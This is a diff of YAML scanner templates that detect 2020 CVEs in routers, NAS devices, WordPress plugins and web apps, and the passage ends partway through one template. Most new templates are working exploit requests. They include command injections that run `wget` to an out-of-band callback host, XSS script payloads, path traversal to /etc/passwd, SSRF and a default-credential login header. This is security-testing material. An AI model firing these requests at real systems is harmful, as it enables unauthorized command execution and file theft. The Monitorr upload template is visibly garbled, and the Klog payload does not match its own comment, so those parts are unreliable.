new file mode 100644
index 0000000000..18de468cad
--- /dev/null
+++ b/cves/2020/CVE-2020-25506.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-25506
+
+info:
+ name: D-Link DNS-320 - Unauthenticated Remote Code Execution
+ author: gy741
+ severity: critical
+ description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
+ reference: |
+ - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
+ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
+ tags: cve,cve2020,dlink,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /cgi-bin/system_mgr.cgi? HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Connection: close
+
+ C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
+
+ - |
+ POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Connection: close
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml
index c25c447def..92402a073f 100644
--- a/cves/2020/CVE-2020-25540.yaml
+++ b/cves/2020/CVE-2020-25540.yaml
@@ -6,7 +6,7 @@ info:
severity: medium
description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
reference: https://www.exploit-db.com/exploits/48812
- tags: cve,cve2020,thinkadmin,traversal
+ tags: cve,cve2020,thinkadmin,lfi
requests:
- method: GET
@@ -20,4 +20,4 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
diff --git a/cves/2020/CVE-2020-26073.yaml b/cves/2020/CVE-2020-26073.yaml
index e089d618b5..cb775c813c 100644
--- a/cves/2020/CVE-2020-26073.yaml
+++ b/cves/2020/CVE-2020-26073.yaml
@@ -1,9 +1,12 @@
-id: CVE-2020–26073
+id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
+ description: |
+ A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information.
+ reference:
+ - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
tags: cve,cve2020,cisco,lfi
requests:
@@ -17,5 +20,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml
new file mode 100644
index 0000000000..35c649d8e1
--- /dev/null
+++ b/cves/2020/CVE-2020-26153.yaml
@@ -0,0 +1,33 @@
+id: CVE-2020-26153
+
+info:
+ name: Event Espresso Core-Reg XSS
+ author: pikpikcu
+ severity: medium
+ description: |
+ cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+ reference: |
+ - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-26153
+ tags: cve,cve2020,xss,wordpress,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"/>'
+ part: body
+
+ - type: status
+ status:
+ - 500
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml
index 4d3b60ac22..ec02c9eb2d 100644
--- a/cves/2020/CVE-2020-26214.yaml
+++ b/cves/2020/CVE-2020-26214.yaml
@@ -1,16 +1,17 @@
id: CVE-2020-26214
info:
- name: Alerta Authentication Bypass (CVE-2020-26214)
+ name: Alerta Authentication Bypass
author: CasperGN
severity: critical
- description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests.
- reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
+ description: |
+ Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind requests.
+ reference: |
+ - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
+ - https://tools.ietf.org/html/rfc4513#section-5.1.2
+ - https://pypi.org/project/alerta-server/8.1.0/
tags: cve,cve2020,alerta
- # Reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
- # Reference: https://tools.ietf.org/html/rfc4513#section-5.1.2
-
requests:
- method: GET
path:
@@ -23,13 +24,11 @@ requests:
- 200
- type: regex
regex:
- - 'name":"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
- - 'name": "Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
+ - 'name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
condition: or
- type: regex
regex:
- - 'provider":"ldap"'
- - 'provider": "ldap"'
+ - 'provider":\s*"ldap"'
condition: or
extractors:
- type: regex
@@ -37,5 +36,4 @@ requests:
name: alerta-version
group: 1
regex:
- - 'name":"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
- - 'name": "Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
+ - 'name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml
new file mode 100644
index 0000000000..c658ea4e31
--- /dev/null
+++ b/cves/2020/CVE-2020-26919.yaml
@@ -0,0 +1,28 @@
+id: CVE-2020-26919
+
+info:
+ name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution
+ author: gy741
+ severity: critical
+ description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands.
+ reference: |
+ - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
+ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
+ tags: cve,cve2020,netgear,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /login.htm HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Connection: close
+
+ submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml
new file mode 100644
index 0000000000..54d281ece9
--- /dev/null
+++ b/cves/2020/CVE-2020-26948.yaml
@@ -0,0 +1,27 @@
+id: CVE-2020-26948
+
+info:
+ name: Emby Server SSRF
+ author: dwisiswant0
+ severity: critical
+ reference: https://github.com/btnz-k/emby_ssrf
+ description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter.
+ tags: cve,cve2020,emby,jellyfin,ssrf
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
+ - type: word
+ words:
+ - "Name or service not known"
+ part: body
+ - type: word
+ words:
+ - "text/plain"
+ part: header
diff --git a/cves/2020/CVE-2020-27361.yaml b/cves/2020/CVE-2020-27361.yaml
new file mode 100644
index 0000000000..cc00677a99
--- /dev/null
+++ b/cves/2020/CVE-2020-27361.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-27361
+
+info:
+ name: Akkadian Provisioning Manager - Files Listing
+ author: gy741
+ severity: high
+ description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories.
+ reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
+ tags: cve,cve2020,akkadian,listing,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pme/media/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of /pme/media"
+ - "Parent Directory"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml
new file mode 100644
index 0000000000..31b0f18651
--- /dev/null
+++ b/cves/2020/CVE-2020-27735.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-27735
+
+info:
+ name: Wing FTP's Web Interface XSS
+ author: pikpikcu
+ severity: medium
+ description: |
+ An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
+ tags: cve,cve2020,xss,wing-ftp
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ' '
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml
new file mode 100644
index 0000000000..78a7cfb467
--- /dev/null
+++ b/cves/2020/CVE-2020-27866.yaml
@@ -0,0 +1,33 @@
+id: CVE-2020-27866
+
+info:
+ name: Netgear Authentication Bypass vulnerability
+ author: gy741
+ severity: high
+ description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
+ tags: cve,cve2020,netgear,auth-bypass
+ reference: |
+ - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
+ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
+
+requests:
+ - raw:
+ - |
+ GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'Debug Enable!'
+ part: body
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml
index a058f7e4ad..91159315d6 100644
--- a/cves/2020/CVE-2020-27982.yaml
+++ b/cves/2020/CVE-2020-27982.yaml
@@ -3,6 +3,7 @@ info:
name: IceWarp WebMail Reflected XSS
author: madrobot
severity: medium
+ description: IceWarp 11.4.5.0 allows XSS via the language parameter.
reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
tags: cve,cve2020,xss,icewarp
diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml
index 3accd2bd08..11af6fe532 100644
--- a/cves/2020/CVE-2020-27986.yaml
+++ b/cves/2020/CVE-2020-27986.yaml
@@ -8,7 +8,7 @@ info:
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
SVN, and GitLab credentials via the api/settings/values URI.
NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
- refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986
+ references: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
tags: cve,cve2020,sonarqube
requests:
@@ -25,7 +25,7 @@ requests:
- email.smtp_port.secured
- email.smtp_username.secured
part: body
- condtion: and
+ condition: and
- type: status
status:
- 200
diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml
new file mode 100644
index 0000000000..acf4e53aa4
--- /dev/null
+++ b/cves/2020/CVE-2020-28188.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-28188
+
+info:
+ name: TerraMaster TOS - Unauthenticated Remote Command Execution
+ author: gy741
+ severity: critical
+ description: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.
+ reference: |
+ - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
+ - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
+ - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
+ tags: cve,cve2020,terramaster,rce,oob
+
+requests:
+ - raw:
+ - |
+ GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
+ Host: {{Hostname}}
+ User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: keep-alive
+
+ GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
+ Host: {{Hostname}}
+ User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: keep-alive
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml
new file mode 100644
index 0000000000..eb7d3e6d13
--- /dev/null
+++ b/cves/2020/CVE-2020-28208.yaml
@@ -0,0 +1,34 @@
+id: CVE-2020-28208
+
+info:
+ name: RocketChat Unauthenticated Email enumeration
+ author: pdteam
+ severity: medium
+ description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
+ reference: https://trovent.io/security-advisory-2010-01
+ tags: cve,cve2020,rockethchat
+
+requests:
+ - raw:
+ - |
+ POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ X-Requested-With: XMLHttpRequest
+ Content-Type: application/json
+ User-Agent: Ophion SecurityGroup
+ Accept-Language: en-US,en;q=0.9
+
+ {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - '"result\":false'
+ - '"success":true'
+ part: body
+ condition: and
diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml
new file mode 100644
index 0000000000..b6567e7135
--- /dev/null
+++ b/cves/2020/CVE-2020-28871.yaml
@@ -0,0 +1,44 @@
+id: CVE-2020-28871
+
+info:
+ name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
+ author: gy741
+ severity: critical
+ description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-28871
+ - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
+ - https://www.exploit-db.com/exploits/48980
+ tags: cve,cve2020,monitorr,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /assets/php/upload.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: text/plain, */*; q=0.01
+ Connection: close
+ Accept-Language: en-US,en;q=0.5
+ X-Requested-With: XMLHttpRequest
+ Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
+ Origin: http://{{Hostname}}
+ Referer: http://{{Hostname}}
+
+ -----------------------------31046105003900160576454225745
+ Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
+ Content-Type: image/gif
+
+ GIF89a2132131231'
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml
new file mode 100644
index 0000000000..843afecf33
--- /dev/null
+++ b/cves/2020/CVE-2020-29227.yaml
@@ -0,0 +1,25 @@
+id: CVE-2020-29227
+
+info:
+ name: Car Rental Management System 1.0 - Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
+ reference: |
+ - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-29227
+ tags: cve,cve2020,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?page=/etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-29395.yaml b/cves/2020/CVE-2020-29395.yaml
new file mode 100644
index 0000000000..2de1016d50
--- /dev/null
+++ b/cves/2020/CVE-2020-29395.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-29395
+
+info:
+ name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-29395
+ tags: cve,cve2020,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-3187.yaml b/cves/2020/CVE-2020-3187.yaml
index e249600ceb..346ae735d7 100644
--- a/cves/2020/CVE-2020-3187.yaml
+++ b/cves/2020/CVE-2020-3187.yaml
@@ -5,7 +5,10 @@ info:
author: KareemSe1im
severity: high
description: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system.
- reference: https://twitter.com/aboul3la/status/1286809567989575685
+ reference:
+ - https://twitter.com/aboul3la/status/1286809567989575685
+ - http://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
+ - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43
tags: cve,cve2020,cisco
requests:
diff --git a/cves/2020/CVE-2020-3452.yaml b/cves/2020/CVE-2020-3452.yaml
index 22b8e9bf7b..1a5f9d3e7f 100644
--- a/cves/2020/CVE-2020-3452.yaml
+++ b/cves/2020/CVE-2020-3452.yaml
@@ -4,8 +4,16 @@ info:
name: CVE-2020-3452
author: pdteam
severity: medium
- reference: https://twitter.com/aboul3la/status/1286012324722155525
- tags: cve,cve2020,cisco,traversal
+ description: |
+ A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
+ reference:
+ - https://twitter.com/aboul3la/status/1286012324722155525
+ - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html
+ - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html
+ - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html
+ - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html
+ - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
+ tags: cve,cve2020,cisco,lfi
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml
new file mode 100644
index 0000000000..2470e2c195
--- /dev/null
+++ b/cves/2020/CVE-2020-35338.yaml
@@ -0,0 +1,28 @@
+id: CVE-2020-35338
+
+info:
+ author: Jeya Seelan
+ severity: critical
+ name: Default Credentials of WMT Server
+ description: The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-35338
+ - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa
+ tags: cve,cve2020,wmt,default-login
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/server/"
+ headers:
+ Authorization: "Basic OnBva29u"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "WMT Server playout"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml
index 38bce2988e..a73f95890b 100644
--- a/cves/2020/CVE-2020-35476.yaml
+++ b/cves/2020/CVE-2020-35476.yaml
@@ -20,13 +20,15 @@ requests:
- type: status
status:
- 200
- - type: regex
- regex:
+
+ - type: word
+ words:
- plotted
- timing
- cachehit
part: body
- condtion: and
+ condition: and
+
- type: word
words:
- application/json
diff --git a/cves/2020/CVE-2020-35489.yaml b/cves/2020/CVE-2020-35489.yaml
new file mode 100644
index 0000000000..bac1875c05
--- /dev/null
+++ b/cves/2020/CVE-2020-35489.yaml
@@ -0,0 +1,36 @@
+id: CVE-2020-35489
+
+info:
+ name: WordPress Contact Form 7 Plugin - Unrestricted File Upload
+ author: soyelmago
+ severity: critical
+ description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489
+ tags: cve,cve2020,wordpress,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Contact Form 7"
+ part: body
+
+ - type: regex
+ regex:
+ - '^== Changelog =="'
+ part: body
+
+ - type: regex
+ regex:
+ - '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) ='
+ negative: true
+ part: body
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml
new file mode 100644
index 0000000000..c5fa22a091
--- /dev/null
+++ b/cves/2020/CVE-2020-35580.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-35580
+
+info:
+ name: SearchBlox < 9.2.2 - Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
+ reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
+ tags: cve,cve2020,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"
+
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ part: body
diff --git a/cves/2020/CVE-2020-35598.yaml b/cves/2020/CVE-2020-35598.yaml
new file mode 100644
index 0000000000..b4ec328110
--- /dev/null
+++ b/cves/2020/CVE-2020-35598.yaml
@@ -0,0 +1,27 @@
+id: CVE-2020-35598
+
+info:
+ name: Advanced Comment System 1.0 - Path Traversal
+ author: daffainfo
+ severity: high
+ description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
+ reference: |
+ - https://www.exploit-db.com/exploits/49343
+ - https://www.cvedetails.com/cve/CVE-2020-35598
+ tags: cve,cve2020,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml
new file mode 100644
index 0000000000..d65d7e96c6
--- /dev/null
+++ b/cves/2020/CVE-2020-35713.yaml
@@ -0,0 +1,29 @@
+id: CVE-2020-35713
+
+info:
+ name: Linksys RE6500 Pre-Auth RCE
+ author: gy741
+ severity: critical
+ reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
+ description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
+ tags: cve,cve2020,linksys,rce,oob,router
+
+requests:
+ - raw:
+ - |
+ POST /goform/setSysAdm HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: keep-alive
+ Origin: http://{{Hostname}}
+ Referer: http://{{Hostname}}/login.shtml
+
+ admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml
new file mode 100644
index 0000000000..f0af5aa3ab
--- /dev/null
+++ b/cves/2020/CVE-2020-35729.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-35729
+
+info:
+ name: Klog Server Unauthenticated Command Injection
+ author: dwisiswant0
+ severity: critical
+ reference: https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
+ description: |
+ This template exploits an unauthenticated command injection vulnerability
+ in Klog Server versions 2.4.1 and prior.
+
+ The `authenticate.php` file uses the `user` HTTP POST parameter in a call
+ to the `shell_exec()` PHP function without appropriate input validation,
+ allowing arbitrary command execution as the apache user.
+
+ The sudo configuration permits the apache user to execute any command
+ as root without providing a password, resulting in privileged command
+ execution as root.
+
+ Originated from Metasploit module, copyright (c) space-r7.
+ tags: cve,cve2020,klog,rce
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/actions/authenticate.php"
+ body: 'user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"
+ matchers:
+ - type: word
+ words:
+ - "poc-testing" # from Base64 decoding payload
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-35736.yaml b/cves/2020/CVE-2020-35736.yaml
new file mode 100644
index 0000000000..0a2da783b9
--- /dev/null
+++ b/cves/2020/CVE-2020-35736.yaml
@@ -0,0 +1,26 @@
+id: CVE-2020-35736
+
+info:
+ name: GateOne Arbitrary File Download
+ author: pikpikcu
+ severity: high
+ description: GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. directory traversal because os.path.join is misused.
+ reference: |
+ - https://github.com/liftoff/GateOne/issues/747
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-35736
+ tags: cve,cve2020,gateone,lfi
+
+requests:
+ - method: GET
+ path:
